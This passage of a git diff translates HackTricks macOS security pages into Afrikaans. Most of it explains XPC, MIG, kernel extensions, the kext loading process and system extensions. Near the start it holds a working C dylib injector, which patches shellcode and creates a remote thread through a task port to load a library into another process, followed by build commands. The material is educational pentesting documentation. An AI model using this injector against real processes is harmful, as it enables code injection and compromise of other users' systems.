+fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); - return (-3); - } +// Patch shellcode + +int i = 0; +char *possiblePatchLocation = (injectedCode ); +for (i = 0 ; i < 0x100; i++) +{ + +// Patching is crude, but works. +// +extern void *_pthread_set_self; +possiblePatchLocation++; - // Set the permissions on the allocated code memory - kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); +uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread; +uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit; +uint64_t addrOfDlopen = (uint64_t) dlopen; - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0) +{ +memcpy(possiblePatchLocation, &addrOfPthreadExit,8); +printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit); +} - // Set the permissions on the allocated stack memory - kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0) +{ +memcpy(possiblePatchLocation, &addrOfPthreadCreate,8); +printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate); +} + +if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) +{ +printf ("DLOpen @%llx\n", addrOfDlopen); +memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); +} + +if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) +{ +strcpy(possiblePatchLocation, lib ); +} +} + +// Write the shellcode to the allocated memory +kr = mach_vm_write(remoteTask, // Task port +remoteCode64, // Virtual Address (Destination) +(vm_address_t) injectedCode, // Source +0xa9); // Length of the source - // Create thread to run shellcode - struct arm_unified_thread_state remoteThreadState64; - thread_act_t remoteThread; +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); +return (-3); +} - memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); - remoteStack64 += (STACK_SIZE / 2); // this is the real stack - //remoteStack64 -= 8; // need alignment of 16 +// Set the permissions on the allocated code memory +```c +kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); - const char* p = (const char*) remoteCode64; +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Kan nie geheue toestemmings instel vir kode van afstandige draad nie: Fout %s\n", mach_error_string(kr)); +return (-4); +} - remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; - remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; - remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; - remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; +// Stel die toestemmings op die toegewysde stapelgeheue +kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Kan nie geheue toestemmings instel vir stapel van afstandige draad nie: Fout %s\n", mach_error_string(kr)); +return (-4); +} - kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, - (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); - if (kr != KERN_SUCCESS) { - fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); - return (-3); - } +// Skep draad om skelkode uit te voer +struct arm_unified_thread_state remoteThreadState64; +thread_act_t remoteThread; - return (0); +memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); + +remoteStack64 += (STACK_SIZE / 2); // dit is die werklike stapel +//remoteStack64 -= 8; // nodig uitlyning van 16 + +const char* p = (const char*) remoteCode64; + +remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; +remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; +remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; +remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; + +printf ("Afstandige Stapel 64 0x%llx, Afstandige kode is %p\n", remoteStack64, p ); + +kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, +(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); + +if (kr != KERN_SUCCESS) { +fprintf(stderr,"Kan nie afstandige draad skep nie: Fout %s", mach_error_string (kr)); +return (-3); +} + +return (0); } int main(int argc, const char * argv[]) { - if (argc < 3) - { - fprintf (stderr, "Usage: %s _pid_ _action_\n", argv[0]); - fprintf (stderr, " _action_: path to a dylib on disk\n"); - exit(0); - } +if (argc < 3) +{ +fprintf (stderr, "Gebruik: %s _pid_ _aksie_\n", argv[0]); +fprintf (stderr, " _aksie_: pad na 'n dylib op skyf\n"); +exit(0); +} - pid_t pid = atoi(argv[1]); - const char *action = argv[2]; - struct stat buf; +pid_t pid = atoi(argv[1]); +const char *action = argv[2]; +struct stat buf; - int rc = stat (action, &buf); - if (rc == 0) inject(pid,action); - else - { - fprintf(stderr,"Dylib not found\n"); - } +int rc = stat (action, &buf); +if (rc == 0) inject(pid,action); +else +{ +fprintf(stderr,"Dylib nie gevind nie\n"); +} } ``` - - -
- ```bash gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector ./inject ``` +### Draadkaping via Taakpoort -### Thread Hijacking via Task port +In hierdie tegniek word 'n draad van die proses gekaap: -In this technique a thread of the process is hijacked: - -{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md" %} -[macos-thread-injection-via-task-port.md](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md) +{% content-ref url="../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-draadinspuiting-via-taakpoort.md" %} +[macos-draadinspuiting-via-taakpoort.md](../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-draadinspuiting-via-taakpoort.md) {% endcontent-ref %} ## XPC -### Basic Information +### Basiese Inligting -XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication, is a framework for **communication between processes** on macOS and iOS. XPC provides a mechanism for making **safe, asynchronous method calls between different processes** on the system. It's a part of Apple's security paradigm, allowing for the **creation of privilege-separated applications** where each **component** runs with **only the permissions it needs** to do its job, thereby limiting the potential damage from a compromised process. +XPC, wat staan vir XNU (die kernel wat deur macOS gebruik word) interproseskommunikasie, is 'n raamwerk vir **kommunikasie tussen prosesse** op macOS en iOS. XPC bied 'n meganisme vir die maak van **veilige, asynchrone metode-oproepe tussen verskillende prosesse** op die stelsel. Dit is 'n deel van Apple se veiligheidsparadigma wat die **skepping van voorreg-geskeide toepassings** moontlik maak waar elke **komponent** met **slegs die toestemmings wat dit nodig het** om sy werk te doen, loop, en sodoende die potensiële skade van 'n gekompromitteerde proses beperk. -For more information about how this **communication work** on how it **could be vulnerable** check: +Vir meer inligting oor hoe hierdie **kommunikasie werk** en hoe dit **kwesbaar kan wees**, kyk na: -{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/" %} -[macos-xpc](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/) +{% content-ref url="../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-xpc/" %} +[macos-xpc](../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-xpc/) {% endcontent-ref %} ## MIG - Mach Interface Generator -MIG was created to **simplify the process of Mach IPC** code creation. It basically **generates the needed code** for server and client to communicate with a given definition. Even if the generated code is ugly, a developer will just need to import it and his code will be much simpler than before. +MIG is geskep om die proses van Mach IPC-kode-skepping te **vereenvoudig**. Dit genereer basies die benodigde kode vir die bediener en kliënt om met 'n gegewe definisie te kommunikeer. Selfs al is die gegenereerde kode lelik, 'n ontwikkelaar hoef dit net in te voer en sy kode sal baie eenvoudiger wees as voorheen. -For more info check: +Vir meer inligting, kyk na: -{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md" %} -[macos-mig-mach-interface-generator.md](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md) +{% content-ref url="../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md" %} +[macos-mig-mach-interface-generator.md](../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md) {% endcontent-ref %} -## References +## Verwysings * [https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html) * [https://knight.sc/malware/2019/03/15/code-injection-on-macos.html](https://knight.sc/malware/2019/03/15/code-injection-on-macos.html) @@ -854,14 +882,14 @@ For more info check:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md index 9ae704aaa..e17f07d3f 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md @@ -1,62 +1,62 @@ -# macOS Kernel Extensions +# macOS Kerneluitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS- en HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). +* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-## Basic Information +## Basiese Inligting -Kernel extensions (Kexts) are **packages** with a **`.kext`** extension that are **loaded directly into the macOS kernel space**, providing additional functionality to the main operating system. +Kerneluitbreidings (Kexts) is **pakette** met 'n **`.kext`**-uitbreiding wat **direk in die macOS-kernelruimte gelaai** word en addisionele funksionaliteit aan die hoof-bedryfstelsel bied. -### Requirements +### Vereistes -Obviously, this is so powerful that it is **complicated to load a kernel extension**. These are the **requirements** that a kernel extension must meet to be loaded: +Dit is vanselfsprekend dat dit so kragtig is dat dit **moeilik is om 'n kerneluitbreiding te laai**. Hier is die **vereistes** wat 'n kerneluitbreiding moet nakom om gelaai te word: -* When **entering recovery mode**, kernel **extensions must be allowed** to be loaded: +* Wanneer jy **herstelmodus betree**, moet kernel-uitbreidings toegelaat word om gelaai te word:
-* The kernel extension must be **signed with a kernel code signing certificate**, which can only be **granted by Apple**. Who will review in detail the company and the reasons why it is needed. -* The kernel extension must also be **notarized**, Apple will be able to check it for malware. -* Then, the **root** user is the one who can **load the kernel extension** and the files inside the package must **belong to root**. -* During the upload process, the package must be prepared in a **protected non-root location**: `/Library/StagedExtensions` (requires the `com.apple.rootless.storage.KernelExtensionManagement` grant). -* Finally, when attempting to load it, the user will [**receive a confirmation request**](https://developer.apple.com/library/archive/technotes/tn2459/\_index.html) and, if accepted, the computer must be **restarted** to load it. +* Die kerneluitbreiding moet **onderteken wees met 'n kernel-kodesertifikaat**, wat slegs deur Apple **toegeken** kan word. Apple sal in detail die maatskappy en die redes waarom dit nodig is, ondersoek. +* Die kerneluitbreiding moet ook **genotariseer** word, sodat Apple dit vir malware kan ondersoek. +* Die **root**-gebruiker is die een wat die kerneluitbreiding kan laai en die lêers binne die pakkie moet aan **root** behoort. +* Tydens die oplaai-proses moet die pakkie voorberei word in 'n **beskermde nie-root-plek**: `/Library/StagedExtensions` (vereis die `com.apple.rootless.storage.KernelExtensionManagement` toekenning). +* Laastens, wanneer jy probeer om dit te laai, sal die gebruiker 'n [**bevestigingsversoek ontvang**](https://developer.apple.com/library/archive/technotes/tn2459/\_index.html) en, indien aanvaar, moet die rekenaar **herlaai** word om dit te laai. -### Loading process +### Laaiproses -In Catalina it was like this: It is interesting to note that the **verification** process occurs in **userland**. However, only applications with the **`com.apple.private.security.kext-management`** grant can **request the kernel to load an extension**: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd` +In Catalina was dit so: Dit is interessant om op te merk dat die **verifikasieproses** in **userland** plaasvind. Slegs programme met die **`com.apple.private.security.kext-management`**-toekenning kan egter die kernel versoek om 'n uitbreiding te laai: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd` -1. **`kextutil`** cli **starts** the **verification** process for loading an extension - * It will talk to **`kextd`** by sending using a **Mach service**. -2. **`kextd`** will check several things, such as the **signature** - * It will talk to **`syspolicyd`** to **check** if the extension can be **loaded**. -3. **`syspolicyd`** will **prompt** the **user** if the extension has not been previously loaded. - * **`syspolicyd`** will report the result to **`kextd`** -4. **`kextd`** will finally be able to **tell the kernel to load** the extension +1. **`kextutil`**-opdraglyn **begin** die **verifikasieproses** vir die laai van 'n uitbreiding +* Dit sal met **`kextd`** praat deur gebruik te maak van 'n **Mach-diens**. +2. **`kextd`** sal verskeie dinge nagaan, soos die **handtekening** +* Dit sal met **`syspolicyd`** praat om te **kontroleer** of die uitbreiding gelaai kan word. +3. **`syspolicyd`** sal die **gebruiker versoek** as die uitbreiding nie voorheen gelaai is nie. +* **`syspolicyd`** sal die resultaat aan **`kextd`** rapporteer +4. **`kextd`** sal uiteindelik die kernel kan **instrueer om die uitbreiding te laai** -If **`kextd`** is not available, **`kextutil`** can perform the same checks. +As **`kextd`** nie beskikbaar is nie, kan **`kextutil`** dieselfde kontroles uitvoer. -## Referencias +## Verwysings * [https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/](https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/) * [https://www.youtube.com/watch?v=hGKOskSiaQo](https://www.youtube.com/watch?v=hGKOskSiaQo)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS- en HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). +* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md index ae83bd63a..3fb22428c 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md @@ -1,30 +1,30 @@ -# macOS Kernel Vulnerabilities +# macOS Kernel Kwesbaarhede
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS en HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). +* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
## [Pwning OTA](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) -[**In this report**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) are explained several vulnerabilities that allowed to compromised the kernel compromising the software updater.\ +[**In hierdie verslag**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) word verskeie kwesbaarhede verduidelik wat dit moontlik gemaak het om die kernel te kompromitteer deur die sagteware-opdatering te kompromitteer.\ [**PoC**](https://github.com/jhftss/POC/tree/main/CVE-2022-46722).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS en HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). +* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md index da69901e1..a73cdfa1e 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md @@ -1,107 +1,105 @@ -# macOS System Extensions +# macOS Stelseluitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## System Extensions / Endpoint Security Framework +## Stelseluitbreidings / Eindpuntsekuriteitsraamwerk -Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction. +In teenstelling met Kernel-uitbreidings, **loop stelseluitbreidings in gebruikersruimte** in plaas van die kernruimte, wat die risiko van 'n stelselcrash as gevolg van uitbreidingsfoute verminder.
https://knight.sc/images/system-extension-internals-1.png
-There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions. +Daar is drie tipes stelseluitbreidings: **DriverKit**-uitbreidings, **Netwerk**-uitbreidings en **Eindpuntsekuriteit**-uitbreidings. -### **DriverKit Extensions** +### **DriverKit-uitbreidings** -DriverKit is a replacement for kernel extensions that **provide hardware support**. It allows device drivers (like USB, Serial, NIC, and HID drivers) to run in user space rather than kernel space. The DriverKit framework includes **user space versions of certain I/O Kit classes**, and the kernel forwards normal I/O Kit events to user space, offering a safer environment for these drivers to run. +DriverKit is 'n vervanging vir kernuitbreidings wat **hardwaresondersteuning bied**. Dit maak dit moontlik dat toestuurprogramme (soos USB-, Seriële-, NIC- en HID-toestuurprogramme) in gebruikersruimte in plaas van kernruimte loop. Die DriverKit-raamwerk sluit **gebruikersruimte-weergawes van sekere I/O Kit-klasse** in, en die kern stuur normale I/O Kit-gebeure na gebruikersruimte, wat 'n veiliger omgewing bied vir hierdie toestuurprogramme om in te loop. -### **Network Extensions** +### **Netwerkuitbreidings** -Network Extensions provide the ability to customize network behaviors. There are several types of Network Extensions: +Netwerkuitbreidings bied die vermoë om netwerkgedrag aan te pas. Daar is verskeie tipes netwerkuitbreidings: -* **App Proxy**: This is used for creating a VPN client that implements a flow-oriented, custom VPN protocol. This means it handles network traffic based on connections (or flows) rather than individual packets. -* **Packet Tunnel**: This is used for creating a VPN client that implements a packet-oriented, custom VPN protocol. This means it handles network traffic based on individual packets. -* **Filter Data**: This is used for filtering network "flows". It can monitor or modify network data at the flow level. -* **Filter Packet**: This is used for filtering individual network packets. It can monitor or modify network data at the packet level. -* **DNS Proxy**: This is used for creating a custom DNS provider. It can be used to monitor or modify DNS requests and responses. +* **App Proxy**: Dit word gebruik om 'n VPN-kliënt te skep wat 'n vloeigeoriënteerde, aangepaste VPN-protokol implementeer. Dit beteken dit hanteer netwerkverkeer op grond van verbindings (of vloeie) eerder as individuele pakkies. +* **Pakkettunnel**: Dit word gebruik om 'n VPN-kliënt te skep wat 'n pakketgeoriënteerde, aangepaste VPN-protokol implementeer. Dit beteken dit hanteer netwerkverkeer op grond van individuele pakkies. +* **Filterdata**: Dit word gebruik om netwerk "vloeie" te filter. Dit kan netwerkdata op vloeivlak monitor of wysig. +* **Filterpakkie**: Dit word gebruik om individuele netwerkpakkies te filter. 